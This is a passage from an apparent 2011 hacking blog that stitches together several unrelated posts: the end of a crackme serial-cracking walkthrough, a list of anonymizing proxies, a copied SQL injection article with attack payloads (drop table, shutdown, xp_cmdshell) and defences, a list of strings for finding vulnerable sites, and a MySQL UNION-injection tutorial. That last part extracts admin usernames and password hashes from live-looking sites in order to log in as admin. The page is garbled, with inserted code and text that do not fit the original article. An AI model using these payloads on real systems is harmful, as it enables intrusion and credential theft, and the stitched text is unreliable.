The process is then repeated but this time, remember that EDI is no longer 0 so when EDI is multiplied by EAX, we get a different result. i.e. <br /><br />(32-30) + (10 x 1 (previous iteration)) = 0C <br /><br />Continue this through the rest of your serial and we get a final result (1e240 in my case). Actually, what this has done is to convert our serial to hex! <br /><br />So we jump out of the loop and land at 004013F5. This is interesting - remember in the last call where the username was uppercased and XOR'd with 5678h? Well, here we've just hexed the serial and now we're XORing it with 1234h (result is 1f074 in my case)! <br /><br />Simple really! The result is then moved from EDI to EBX and we jump back to our initial piece of code again! <br /><br /><br />---------------------------- <br />Section 8 - The Final Stages <br />---------------------------- <br /><br />This is it..... the final stages of the crackme. We jump back to here : <br />0040123D . 83C4 04 ADD ESP,4 <br />00401240 . 58 POP EAX <br />00401241 . 3BC3 CMP EAX,EBX <br />00401243 . 74 07 JE SHORT Crackme1.0040124C <br />00401245 . E8 18010000 CALL Crackme1.00401362 <br />0040124A .^EB 9A JMP SHORT Crackme1.004011E6 <br />0040124C > E8 FC000000 CALL Crackme1.0040134D <br /><br />The first line is a quick stack cleanup which then leaves our processed username value (54A4 in my case) on the top of the stack. This is then popped to EAX. <br /><br />Then comes the critical comparison : <br />00401241 . 3BC3 CMP EAX,EBX <br /><br />EAX (the result of our username being processed) and EBX are compared - the two values should look familiar as they are the results of our two calls i.e. in my case they are 54A4 and 1f074. <br /><br />The next jump statement is the critical one - if the two values in EAX and EBX are equal, we jump to the call statement at the bottom of the above code extract.... this is our success box! 
(Hence the reason I said we could patch this jump to jump if not equal rather than if equal). If EAX and EBX are not equal, we don't jump and we are taken down the 'No luck there mate' routine - this is where I go on this occasion as 123456 is not my correct serial. <br /><br /><br />----------------------------------- <br />Section 9 - Determining Your Serial <br />----------------------------------- <br /><br />So, we have found that the crucial operation is a comparison of our processed username and our processed serial. Specifically, our processed serial must give the same result as our processed username in order to be valid. So how do we achieve this? <br /><br />Well, this is where knowledge of the XOR function brings us through. We know that : <br />if A XOR B = C <br />then C XOR B = A. <br /><br />So how is this useful? <br />Well, looking at the way the serial is processed, our entered serial in hex XOR with 1234 must equal our processed username (in my case 54A4). Using the above reasoning then, our serial is our processed username XOR with 1234 i.e. (for me) <br /><br />Serial for FaTaLPrIdE = 54A4 XOR 1234 <br /><br />5 4 A 4 = 0101 0100 1010 0100 <br />1 2 3 4 = 0001 0010 0011 0100 <br />SERIAL = 0100 0110 1001 0000 = 4690h <br /><br />Convert to Decimal = 16 + 128 + 512 + 1024 + 16384 = 18064 <br />(we need to do this as we are reversing the fact that our program converts the decimal serial we entered into hex). <br /><br />Hence I have username FaTaLPrIdE (not case sensitive due to the uppercasing routine) and serial 18064. <br /><br /><br />----------------------- <br />Section 10 - Conclusion <br />----------------------- <br /><br />So that's it! I hope you enjoyed this and found it useful. As I say, I'm a complete beginner at this so I thought a beginner's guide written by a beginner would be useful to a few people. <br /><br />If you like this, just pop a comment below and let me know. 
Similarly, if you have a criticism or improvement, I'd like to hear it too. Please don't tell me it was too simple though as that was the point of the article - to explain as much as I could for those who have never used a debugger before. <br /><br />I'd recommend trying crackme 2 if you get a chance. Personally, I think it's easier than this one - use the same techniques and work out how your password is being dealt with. I'll write a tutorial when I get a chance, but feel free to PM me if you want a helping hand before the article is out. <br /><br />As for you reading this because level 8 is bothering you, I hope this will help you out. Level 8 has a few extra tricks up its sleeve but if you've got that far, you should be able to sort through them. Just logically step through and work out exactly what is happening - write it down to keep note. <br /><br />Thanks for reading. Please don't reproduce this on other sites - it's written specifically for the Geeks ;-)</div>Posted by Hacking Skills<br /><br />Exploration Of All Proxies (published 2011-02-13T00:30:00.000-08:00, updated 2011-06-27T20:13:52.751-07:00)<br /><div dir="ltr" style="text-align: left;" trbidi="on">Anonymouse – A very good free anonymizer. By using this CGI proxy you can anonymously surf web pages, send anonymous e-mails and look at news.<br />ProxyKing.net – This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.<br />AnonymousIndex.com – Anonymous private surfing service, hide your ip, manage website ads, referrers and cookies through this free web based proxy.<br />HideMyAss.com – Free anonymous browsing, for the times when you REALLY need to hide your ass online!<br />ProxyFoxy.com – Proxy Foxy offers you free anonymous surfing. 
With our free tool you can surf the Internet safe and secure without revealing your identity. Avoid cookies, spyware and other malicious scripts.<br
/></div>Posted by Hacking Skills<br /><br />Full SQL Injection Tutorial (MySQL) Update with Basics (published 2011-02-09T21:43:00.000-08:00, updated 2011-06-27T20:13:52.752-07:00)<br /><div dir="ltr" style="text-align: left;" trbidi="on">Most of us are here to learn how to hack, but I also know there are a few people here who own websites, so they can prevent the SQLi attack too.<br /><br />-- I didn't write this topic; I just found it on some website and I'll post the link at the end of the topic, so this work is not mine.<br /><br />Some stuff here is not totally new, but for newbies like me it's really good. So enough talk, let's start.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :<br /><br />The database is the heart of most Web applications: it stores the data needed for the Websites and applications to "survive". It stores user credentials and sensitive financial information. It stores preferences, invoices, payments, inventory data, etc. It is through the combination of a database and Web scripting language that we as developers can produce sites that keep clients happy, pay the bills, and -- most importantly -- run our businesses.<br /><br />But what happens when you realize that your critical data may not be safe? What happens when you realize that a new security bug has just been found? Most likely you either patch it or upgrade your database server to a later, bug-free version. Security flaws and patches are found all the time in both databases and programming languages, but I bet 9 out of 10 of you have never heard of SQL injection attacks...<br /><br />In this article I'll attempt to shed some light on this under-documented attack, explaining what an SQL injection attack is and how you can prevent one from occurring within your company. 
By the end of this article you'll be able to identify situations where an SQL injection attack may allow unauthorized persons to penetrate your system, and you'll learn ways to fix existing code to prevent an SQL injection attack.<br /><br />What is an SQL Injection Attack?<br />As you may know, SQL stands for Structured Query Language. It comes in many different dialects, most of which are based on the SQL-92 ANSI standard. An SQL query comprises one or more SQL commands, such as SELECT, UPDATE or INSERT. For SELECT queries, each query typically has a clause by which it returns data, for example:<br /><br />SELECT * FROM Users WHERE userName = 'justin';<br /><br />The clause in the SQL query above is WHERE username = 'justin', meaning that we only want the rows from the Users table returned where the userName field is equal to the string value of Justin.<br /><br />It's these types of queries that make the SQL language so popular and flexible... it's also what makes it open to SQL injection attacks. As the name suggests, an SQL injection attack "injects" or manipulates SQL code. By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways.<br /><br />One of the most popular ways to validate a user on a Website is to provide them with an HTML form through which they can enter their username and password. Let's assume that we have the following simple HTML form:<br /><br /><form name="frmLogin" action="login.asp" method="post"> <br />Username: <input type="text" name="userName"> <br />Password: <input type="text" name="password"> <br /><input type="submit"> <br /></form><br /><br />When the form is submitted, the contents of the username and password fields are passed to the login.asp script, and are available to that script through the Request.Form collection. The easiest way to validate this user would be to build an SQL query, and then check that query against the database to see whether that user exists. 
We could create a login.asp script like this:<br /><br /><% <br /><br />dim userName, password, query <br />dim conn, rs <br /><br />' Raw form input, used unmodified in the query below <br />userName = Request.Form("userName") <br />password = Request.Form("password") <br /><br />set conn = server.createObject("ADODB.Connection") <br />set rs = server.createObject("ADODB.Recordset") <br /><br />' The query text is built by concatenating user input into the SQL string <br />query = "select count(*) from users where userName='" & _<br />userName & "' and userPass='" & password & "'" <br /><br />conn.Open "Provider=SQLOLEDB; Data Source=(local); " & _<br />"Initial Catalog=myDB; User Id=sa; Password=" <br />rs.activeConnection = conn <br />rs.open query <br /><br />' count(*) always returns exactly one row, so test the count rather than rs.eof <br />if rs.fields(0).value > 0 then <br />response.write "Logged In" <br />else <br />response.write "Bad Credentials" <br />end if <br /><br />%><br /><br />In the example above, the user either sees "Logged In" if their credentials matched a record in the database, or "Bad Credentials" if they didn't. Before we continue, let's create the database that we have queried in the sample code. <br /><br />Let's also create a users table with some dummy records:<br /><br />create database myDB <br />go <br /><br />use myDB <br />go <br /><br />create table users <br />( <br />userId int identity(1,1) not null, <br />userName varchar(50) not null, <br />userPass varchar(20) not null <br />) <br /><br />insert into users(userName, userPass) values('john', 'doe') <br />insert into users(userName, userPass) values('admin', 'wwz04ff') <br />insert into users(userName, userPass) values('fsmith', 'mypassword')<br /><br />So if I entered a username of john and password of doe, then I would be presented with the text "Logged In". The query would look something like this:<br /><br />select count(*) from users where userName='john' and userPass='doe'<br /><br />There's nothing insecure or dangerous about this query... is there? 
Maybe not at first glance, but what about if I entered a username of john and a password of ' or 1=1 --<br /><br />The resultant query would now look like this:<br /><br />select count(*) from users where userName='john' and userPass='' <br />or 1=1 --'<br /><br />In the example above I've italicised the username and password so they are a bit easier to read, but basically what happens is that the query now only checks for any user with a username field of john. Instead of checking for a matching password, it now checks for an empty password, or the conditional equation of 1=1. This means that if the password field is empty OR 1 equals 1 (which it does), then a valid row has been found in the users table. Notice how the last quote is commented out with a single-line comment delimiter (--). This stops ASP from returning an error about any unclosed quotations.<br /><br />So with the login.asp script we created above, one row would be returned, and the text "Logged In" would be displayed. We could take this a bit further by doing the same thing to the username field, like this:<br /><br />Username: ' or 1=1 --- <br />Password: [Empty]<br /><br />This would execute the following query against the users table:<br /><br />select count(*) from users where userName='' or 1=1 --' and userPass=''<br /><br />The query above now returns a count of all rows in the user table. 
This is the perfect example of an SQL injection attack: adding code that manipulates the contents of a query to produce an undesired result.<br /><br />Another popular way to validate a user against a table of logins is to compare their details against the table, and retrieve the valid username from the database, like this:<br /><br />query = "select userName from users where userName='" & _<br />userName & "' and userPass='" & password & "'" <br /><br />conn.Open "Provider=SQLOLEDB; Data Source=(local); " & _<br />"Initial Catalog=myDB; User Id=sa; Password=" <br />rs.activeConnection = conn <br />rs.open query <br /><br />' Any returned row counts as a successful login; the first row's userName is shown <br />if not rs.eof then <br />response.write "Logged In As " & rs.fields(0).value <br />else <br />response.write "Bad Credentials" <br />end if<br /><br />So, if we entered a username of john and a password of doe, then we would be presented with:<br /><br />Logged In As john<br /><br />However, if we used the following login credentials:<br /><br />Username: ' or 1=1 --- <br />Password: [Anything]<br /><br />Then we would also be logged in as John, because the row whose username field is John comes first in the list, based on the insert queries we saw earlier:<br /><br />insert into users(userName, userPass) values('john', 'doe') <br />insert into users(userName, userPass) values('admin', 'wwz04ff') <br />insert into users(userName, userPass) values('fsmith', 'mypassword') <br /><br />Injection Attack Examples<br />Forcing a login through an HTML form like the one we just saw is a typical example of an SQL injection attack, and we'll look at ways to fix these types of attacks a little later.<br /><br />But first, I want to take a look at some examples of SQL injection attack executions. First off, let's stick with our example login form, which contains a username and password field.<br /><br />Example #1<br /><br />Microsoft SQL Server has its own dialect of SQL, which is called Transact SQL, or TSQL for short. 
We can exploit the power of TSQL in a number of ways to show how SQL injection attacks work. Consider the following query, which is based on the users table we created on the last page:<br /><br />select userName from users where userName='' having 1=1<br /><br />If you're an SQL buff, then you'll no doubt be aware that this query raises an error. We can easily make our login.asp page query our database with this query by using these login credentials:<br /><br />Username: ' having 1=1 --- <br /><br />Password: [Anything]<br /><br />When I click on the submit button to start the login process, the SQL query causes ASP to spit the following error to the browser:<br /><br />Microsoft OLE DB Provider for SQL Server (0x80040E14)<br /><br />Column 'users.userName' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.<br /><br />/login.asp, line 16<br /><br />Well well. It appears that this error message now tells the unauthorized user the name of one field from the database that we were trying to validate the login credentials against: users.userName. Using the name of this field, we can now use SQL Server's LIKE keyword to login with the following credentials:<br /><br />Username: ' or users.userName like 'a%' --- <br />Password: [Anything]<br /><br />Once again, this performs an injected SQL query against our users table:<br /><br />select userName from users where userName='' or <br />users.userName like 'a%' --' and userPass=''<br /><br />When we created the users table, we also created a user whose userName field was admin and userPass field was wwz04ff. Logging in with the username and password shown above uses SQL's like keyword to get the username. The query grabs the userName field of the first row whose userName field starts with a, which in this case is admin:<br /><br />Logged In As admin<br /><br />Example #2<br /><br />SQL Server, among other databases, delimits queries with a semi-colon. 
The use of a semi-colon allows multiple queries to be submitted as one batch and executed sequentially, for example:<br /><br />select 1; select 1+2; select 1+3;<br /><br />...would return three recordsets. The first would contain the value 1, the second the value 3, and the third the value 4, etc. So, if we logged in with the following credentials:<br /><br />Username: ' or 1=1; drop table users; -- <br />Password: [Anything]<br /><br />Then the query would execute in two parts. Firstly, it would select the userName field for all rows in the users table. Secondly, it would delete the users table, so that when we went to login next time, we would see the following error:<br /><br />Microsoft OLE DB Provider for SQL Server (0x80040E37) <br />Invalid object name 'users'. <br />/login.asp, line 16<br /><br />Example #3<br /><br />The last example relating to our login form that we'll consider is the execution of TSQL specific commands and extended stored procedures. Many Websites use the default system account (sa) user when logging into SQL Server from their ASP scripts or applications. By default, this user has access to all commands and can delete, rename, and add databases, tables, triggers, and more.<br /><br />One of SQL Server's most powerful commands is SHUTDOWN WITH NOWAIT, which causes SQL Server to shutdown, immediately stopping the Windows service. 
To restart SQL server after this command is issued, you need to use the SQL service manager or some other method of restarting SQL server.<br /><br />Once again, this command can be exploited through our login example:<br /><br />Username: '; shutdown with nowait; -- <br />Password: [Anything]<br /><br />This would make our login.asp script run the following query:<br /><br />select userName from users where userName=''; <br />shutdown with nowait; --' and userPass=''<br /><br />If the user is set up as the default sa account, or the user has the required privileges, then SQL server will shut down, and will require a restart before it will function again.<br /><br />SQL Server also includes several extended stored procedures, which are basically special C++ DLL's that can contain powerful C/C++ code to manipulate the server, read directories and the registries, delete files, run the command prompt, etc. All extended stored procedures exist under the master database and are prefixed with "xp_".<br /><br />There are several extended stored procedures that can cause permanent damage to a system. We can execute an extended stored procedure using our login form with an injected command as the username, like this:<br /><br />Username: '; exec master..xp_xxx; -- <br />Password: [Anything]<br /><br />All we have to do is pick the appropriate extended stored procedure and replace xp_xxx with its name in the sample above. For example, if IIS was installed on the same machine as SQL Server (which is typical for small one/two man setups), then we could restart it by using the xp_cmdshell extended stored procedure (which executes a command string as an operating-system command) and IIS reset. 
All we need to do is enter the following user credentials into our getlogin.asp page:<br /><br />Username: '; exec master..xp_cmdshell 'iisreset'; -- <br />Password: [Anything]<br /><br />This would send the following query to SQL Server:<br /><br />select userName from users where userName=''; <br />exec master..xp_cmdshell 'iisreset'; --' and userPass=''<br /><br />As I'm sure you'll agree, this can cause serious problems, and with the right commands, can cause an entire Website to malfunction.<br /><br />Example #4<br /><br />OK, time to move away from looking at the login.asp script and onto another common method to perform an SQL injection attack.<br /><br />How many times have you been to a Website that sells your favourite gear and seen a URL like this:<br /><br />www.mysite.com/products.asp?productId=2<br /><br />Obviously the 2 is the ID of the product, and a lot of sites would simply build a query around the productId querystring variable, like this:<br /><br />Select prodName from products where id = 2<br /><br />Before we continue, let's assume that we have the following table and rows set up on our SQL server:<br /><br />create table products <br />( <br />id int identity(1,1) not null, <br />prodName varchar(50) not null <br />) <br /><br />insert into products(prodName) values('Pink Hoola Hoop') <br />insert into products(prodName) values('Green Soccer Ball') <br />insert into products(prodName) values('Orange Rocking Chair')<br /><br />Let's also assume that we have created the following ASP script, and called it products.asp:<br /><br /><% <br /><br />dim prodId <br />' Raw querystring value, appended to the query below without any check <br />prodId = Request.QueryString("productId") <br /><br />set conn = server.createObject("ADODB.Connection") <br />set rs = server.createObject("ADODB.Recordset") <br /><br />query = "select prodName from products where id = " & prodId <br /><br />conn.Open "Provider=SQLOLEDB; Data Source=(local); " & _<br />"Initial Catalog=myDB; User Id=sa; Password=" <br />rs.activeConnection = conn <br 
/>rs.open query <br /><br />if not rs.eof then <br />response.write "Got product " & rs.fields("prodName").value <br />else <br />response.write "No product found" <br />end if <br /><br />%><br /><br />So if we visited products.asp in the browser with the following URL:<br /><br />http://localhost/pro...asp?productId=1<br /><br />...we'd see the following line of text in our browser:<br /><br />Got product Pink Hoola Hoop<br /><br />Notice that this time around, product.asp returns a field from the recordset based on the field's name:<br /><br />response.write "Got product " & rs.fields("prodName").value<br /><br />Although this may seem more secure, it really isn't, and we can still manipulate the database just as we have in our last three examples. Notice also that this time the WHERE clause of the query is based on a numerical value:<br /><br />query = "select prodName from products where id = " & prodId<br /><br />In order for the products.asp page to function correctly, all that's required is a numerical product Id passed as the productId querystring variable. Getting around this isn't too much of a problem, however. 
Consider the following URL to products.asp:<br /><br />http://localhost/pro...Id=0%20or%201=1<br /><br />Each %20 in the URL represents a URL-encoded space character, so the URL really looks like this:<br /><br />http://localhost/pro...asp?productId=0 or 1=1<br /><br />When used in conjunction with products.asp, the query looks like this:<br /><br />select prodName from products where id = 0 or 1=1<br /><br />Using a bit of know-how and some URL-encoding, we can just as easily pull the name of the products field from the products table:<br /><br />http://localhost/pro...%20having%201=1<br /><br />This would produce the following error in the browser:<br /><br />Microsoft OLE DB Provider for SQL Server (0x80040E14) <br /><br />Column 'products.prodName' is invalid in the select <br />list because it is not contained in an aggregate <br />function and there is no GROUP BY clause. <br /><br />/products.asp, line 13<br /><br />Now, we can take the name of the products field (products.prodName) and call up the following URL in the browser:<br /><br />http://localhost/pro...into%20products <br />(prodName)%20values(left(@@version,50))<br /><br />Here's the query without the URL-encoded spaces:<br /><br />http://localhost/pro...ductId=0;insert into <br />products(prodName) values(left(@@version,50))<br /><br />Basically it returns "No product found", however it also runs an INSERT query on the products table, adding the first 50 characters of SQL server's @@version variable (which contains the details of SQL Server's version, build, etc.) 
as a new record in the products table.<br /><br />In a real-life situation, you would obviously have to exploit the products table more than this as it would contain dozens of other fields, however the methods would remain the same.<br /><br />To get to the version, it's now a simple matter of calling up the products.asp page with the value of the latest entry in the products table, like this:<br /><br />http://localhost/pro...select%20max(id) <br />%20from%20products)<br /><br />What this query does is grab the ID of the latest row added to the products table using SQL server's MAX function. The result outputs the new row that contains the SQL server version details:<br /><br />Got product Microsoft SQL Server 2000 - 8.00.534 (Intel X86)<br /><br />This method of injection can be used to perform numerous tasks. However the point of this article was to give tips on how to prevent SQL injection attacks, which is what we will look at next. <br /><br />Preventing SQL Injection Attacks<br />If you design your scripts and applications with care, SQL injection attacks can be avoided most of the time. There are a number of things that we as developers can do to reduce our site's susceptibility to attack. Here's a list (in no particular order) of our options:<br /><br />Limit User Access<br /><br />The default system account (sa) for SQL server 2000 should never be used because of its unrestricted nature. You should always setup specific accounts for specific purposes.<br /><br />For example, if you run a database that lets users of your site view and order products, then you should set up a user called webUser_public that has SELECT rights on the products table, and INSERT rights only on the orders table.<br /><br />If you don't make use of extended stored procedures, or have unused triggers, stored procedures, user-defined functions, etc, then remove them, or move them to an isolated server. 
Most extremely damaging SQL injection attacks attempt to make use of several extended stored procedures such as xp_cmdshell and xp_grantlogin, so by removing them, you're theoretically blocking the attack before it can occur.<br /><br />Escape Quotes<br /><br />As we've seen from the examples discussed above, the majority of injection attacks require the use of single quotes to terminate an expression. By using a simple replace function and converting all single quotes to two single quotes, you're greatly reducing the chance of an injection attack succeeding.<br /><br />Using ASP, it's a simple matter of creating a generic replace function that will handle the single quotes automatically, like this:<br /><br /><% <br /><br />' Double every single quote so it is read as a literal quote inside an SQL string <br />function stripQuotes(strWords) <br />stripQuotes = replace(strWords, "'", "''") <br />end function <br /><br />%><br /><br />Now if we use the stripQuotes function in conjunction with our first query for example, then it would go from this:<br /><br />select count(*) from users where userName='john' and <br />userPass='' or 1=1 --'<br /><br />...to this:<br /><br />select count(*) from users where userName='john'' and <br />userPass=''' or 1=1 --'<br /><br />This, in effect, stops the injection attack from taking place, because the clause for the WHERE query now requires both the userName and userPass fields to be valid.<br /><br />Remove Culprit Characters/Character Sequences<br /><br />As we've seen in this article, certain characters and character sequences such as ;, --, select, insert and xp_ can be used to perform an SQL injection attack. 
By removing these characters and character sequences from user input before we build a query, we can help reduce the chance of an injection attack even further.<br /><br />As with the single quote solution, we just need a basic function to handle all of this for us:<br /><br /><% <br /><br />function killChars(strWords) <br /><br />dim badChars <br />dim newChars <br />dim i <br /><br />' Sequences to delete from the input before it is used in a query <br />badChars = array("select", "drop", ";", "--", "insert", _<br />"delete", "xp_") <br />newChars = strWords <br /><br />for i = 0 to uBound(badChars) <br />newChars = replace(newChars, badChars(i), "") <br />next <br /><br />killChars = newChars <br /><br />end function <br /><br />%><br /><br />Using stripQuotes in combination with killChars greatly reduces the chance of any SQL injection attack succeeding. So if we had the query:<br /><br />select prodName from products where id=1; xp_cmdshell 'format <br />c: /q /yes '; drop database myDB; --<br /><br />and ran it through stripQuotes and then killChars, it would end up looking like this:<br /><br />prodName from products where id=1 cmdshell ''format c: <br />/q /yes '' database myDB<br /><br />...which is basically useless, and will return no records from the query.<br /><br />Limit the Length of User Input<br /><br />It's no good having a text box on a form that can accept 50 characters if the field you'll compare it against can only accept 10. By keeping all text boxes and form fields as short as possible, you're reducing the number of characters that can be used to formulate an SQL injection attack.<br /><br />If you're accepting a querystring value for a product ID or the like, always use a function to check if the value is actually numeric, such as the IsNumeric() function for ASP. 
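<br /><br />An added example, not part of the original article: the article's users and products tables rebuilt in an in-memory SQLite database (an assumption standing in for SQL Server, with Python's sqlite3 in place of ASP/ADO), comparing the string-built queries and stripQuotes with bound parameters and an IsNumeric-style check. All function names are illustrative.

```python
import re
import sqlite3

# Constructed data: the article's tables, with SQLite types standing in
# for the SQL Server ones (assumption of this example).
SCHEMA = """
create table users (
    userId   integer primary key,
    userName varchar(50) not null,
    userPass varchar(20) not null
);
insert into users(userName, userPass) values('john', 'doe');
insert into users(userName, userPass) values('admin', 'wwz04ff');
insert into users(userName, userPass) values('fsmith', 'mypassword');
create table products (
    id       integer primary key,
    prodName varchar(50) not null
);
insert into products(prodName) values('Pink Hoola Hoop');
insert into products(prodName) values('Green Soccer Ball');
insert into products(prodName) values('Orange Rocking Chair');
"""


def make_db():
    """Return a fresh in-memory database holding the article's sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def strip_quotes(text):
    """Port of the article's stripQuotes: double every single quote."""
    return text.replace("'", "''")


def login_concat(conn, user_name, password):
    """'Before': query text built from raw input, as in the article's login.asp."""
    query = ("select userName from users where userName='" + user_name +
             "' and userPass='" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_escaped(conn, user_name, password):
    """Same string-built query, with stripQuotes applied to both fields."""
    return login_concat(conn, strip_quotes(user_name), strip_quotes(password))


def login_param(conn, user_name, password):
    """'After': values are bound as data and are never parsed as SQL."""
    row = conn.execute(
        "select userName from users where userName = ? and userPass = ?",
        (user_name, password),
    ).fetchone()
    return row[0] if row else None


def product_concat_escaped(conn, raw_id):
    """Numeric context: quote doubling has nothing to act on here."""
    query = "select prodName from products where id = " + strip_quotes(raw_id)
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def product_safe(conn, raw_id):
    """Length limit and numeric check (IsNumeric analogue), then a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("productId must be a short decimal number")
    row = conn.execute(
        "select prodName from products where id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"  # the password value used earlier in the article
    print("concatenated :", login_concat(db, "john", payload))
    print("stripQuotes  :", login_escaped(db, "john", payload))
    print("parameterised:", login_param(db, "john", payload))
    print("numeric, escaped only:", product_concat_escaped(db, "0 or 1=1"))
    print("numeric, validated   :", product_safe(db, "1"))
```

Quote doubling stops the quoted login payload but leaves the productId query open, because that context needs no quote; bound parameters and a strict numeric check hold in both cases. In classic ASP the equivalent of the bound query is an ADODB.Command with parameters.<br /><br />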
If the value isn't numeric, then either raise an error or redirect the user to another page where they can choose a product.<br /><br />Also, always try to post your forms with the method attribute set to POST, so clued-up users don't get any ideas, as they might if they saw your form variables tacked onto the end of the URL. <br /><br />Conclusion<br />In this article we've seen what an SQL injection attack is and also how to tamper with forms and URLs to produce the results of an attack.<br /><br />It's not always possible to guard against every type of SQL injection attack; however, hopefully you now know about the various types of SQL injection attacks that exist and have also planned ways to combat them on your servers.<br /><br />Although we've only looked at SQL injection attacks with Microsoft SQL server in this article, keep in mind that no database is safe: SQL injection attacks can also occur on MySQL and Oracle database servers -- among others.<br /><br />------ This Article belongs to : http://articles.site...on-attacks-safe/ ------ <br /><br />Here is a complete list of SQL injection strings and how to use it to find vulnerable sites (this does not belong to the article above): <br /><br />use 
those 2 together in front of the (=) sign like this: <br /><br />www.somesiteindex.php?id= admin'-- <br />or<br />www.somesiteplay_old.php?id="a"="a<br /><br />If you get an error like this (you have an error in your SQL syntax; check the manual that corresponds to your MySQL), then this site is vulnerable to SQLi.<br /><br />I hope we always share good stuff here.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Please post your queries, if any occur, and wait for the next update! From hackeramit4u@gmail.com<br />____________________________________________________________________________</div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-65905385955297797822011-02-09T21:38:00.000-08:002011-06-27T20:13:52.752-07:00Full SQL Injection Tutorial (MySQL) Dorks<div dir="ltr" style="text-align: left;" trbidi="on"><br 
/><br 
/></div>Hacking Skills http://www.blogger.com/profile/13163124608674451144 noreply@blogger.com 1 tag:blogger.com,1999:blog-289744729559414161.post-5494258587449917468 2011-02-09T21:33:00.000-08:00 2011-06-27T20:13:52.752-07:00 Full SQL Injection Tutorial (MySQL)<div dir="ltr" style="text-align: left;" trbidi="on">In this tutorial I will describe how SQL injection works and how to<br />use it to get some useful information.<br /><br /><br />First of all: What is SQL injection?<br /><br />It's one of the most common vulnerabilities in web applications today.<br />It allows an attacker to execute database queries through the URL and gain access<br />to some confidential information etc. (in short).<br /><br /><br />1.SQL Injection (classic or error based or whatever you call it) :D<br /><br />2.Blind SQL Injection (the harder part)<br /><br /><br />So let's start with some action :D<br /><br /><br />1). Check for vulnerability<br /><br />Let's say that we have some site like this<br /><br />http://www.site.com/news.php?id=5<br /><br />Now to test if it is vulnerable we add ' (a quote) to the end of the URL,<br /><br />and that would be http://www.site.com/news.php?id=5'<br /><br />so if we get some error like<br />"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."<br />or something similar<br /><br />that means it is vulnerable to SQL injection :)<br /><br />2). Find the number of columns<br /><br />To find the number of columns we use the ORDER BY statement (it tells the database how to order the result)<br /><br />so how to use it? 
Well, just keep incrementing the number until we get an error.<br /><br />http://www.site.com/news.php?id=5 order by 1/* <-- no error<br /><br />http://www.site.com/news.php?id=5 order by 2/* <-- no error<br /><br />http://www.site.com/news.php?id=5 order by 3/* <-- no error<br /><br />http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like this: Unknown column '4' in 'order clause' or something like that)<br /><br />that means that it has 3 columns, because we got an error on 4.<br /><br />3). Check for UNION function<br /><br />With union we can select more data in one SQL statement.<br /><br />so we have<br /><br />http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that the number of columns is 3 in section 2). )<br /><br />if we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works :)<br /><br />4). Check for MySQL version<br /><br />http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* is not working or you get some error, then try --<br />it's a comment and it's important for our query to work properly.<br /><br />let's say that we have number 2 on the screen, now to check for version<br />we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.<br /><br />it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*<br /><br />if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."<br /><br />I didn't see any paper covering this problem, so I must write it :)<br /><br />what we need is the convert() function<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*<br /><br />or with hex() and unhex()<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*<br /><br />and you will get the MySQL version :D<br /><br />5). 
Getting table and column name<br /><br />well if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe it for MySQL > 5.<br />we must guess the table and column names in most cases.<br /><br />common table names are: user/s, admin/s, member/s ...<br /><br />common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...<br /><br />an example would be<br /><br />http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)<br /><br />we know that table admin exists...<br /><br />now to check column names.<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try another column name)<br /><br />we get the username displayed on screen, an example would be admin, or superadmin etc...<br /><br />now to check if column password exists<br /><br />http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try another column name)<br /><br />we see the password on the screen as a hash or in plain-text, it depends on how the database is set up :)<br /><br />i.e. md5 hash, mysql hash, sha1...<br /><br />now we must complete the query to look nice :)<br /><br />for that we can use the concat() function (it joins strings)<br /><br />i.e.<br /><br />http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*<br /><br />Note that I put 0x3a, it's the hex value for : (so 0x3a is the hex value for colon)<br /><br />(there is another way for that, char(58), the ascii value for : )<br /><br /><br />http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*<br /><br />now we get username:password displayed on screen, i.e. admin:admin or admin:somehash<br /><br />when you have this, you can login like admin or some superuser :D<br /><br />if you can't guess the right table name, you can always try mysql.user (default)<br 
